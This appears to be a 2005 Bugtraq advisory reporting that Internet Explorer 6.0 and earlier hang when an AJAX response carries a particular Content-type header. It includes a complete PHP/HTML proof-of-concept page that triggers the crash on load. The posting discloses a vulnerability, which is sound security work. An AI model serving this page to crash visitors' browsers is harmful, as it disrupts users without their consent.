Date: 26 Jul 2005 16:23:01 -0000
From: anakin@...5.pl
To: bugtraq@...urityfocus.com
Subject: Internet Explorer AJAX Bug


Summary:
Internet Explorer 6.0 and below hangs when entering a prepared page.

Details:
When using AJAX (Asynchronous JavaScript and XML) to load page content dynamically, we are allowed to do anything on the server side. The Internet Explorer process hangs when a Content-type header is sent within.

Vulnerable Versions:
Internet Explorer 6.0 and below, tested on Windows XP, 2000 and 2003.

Patches/Workarounds:
Unknown.

Exploits:
Execute the following PHP script in IE to cause its process to die.

<?php

    if (@$_SERVER['QUERY_STRING'] == 'ajax') {
        /**
            Sending this header causes Internet Explorer to hang.
        */
        header('Content-type: text/html; encoding=utf-8');
        echo "\n";
        exit;
    }

?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl">
<head>
  <title></title>
  <script type="text/javascript">
  
    function pageLoad() {
    
        xmlHttp = false;
        try {
            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
        } catch (e) {
            try {
                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
            } catch (e) {
                xmlHttp = false;
            }
        }
        if (!xmlHttp && typeof XMLHttpRequest != 'undefined')
          xmlHttp = new XMLHttpRequest();
        if (!xmlHttp)
          return;
        xmlHttp.open("GET", "?ajax", true);
        xmlHttp.send(null);        
    }
  
  </script>
</head>
<body onload="pageLoad()">
</body>
</html>


Discovered by
Łukasz Lach
anakin[at]php5[dot]pl

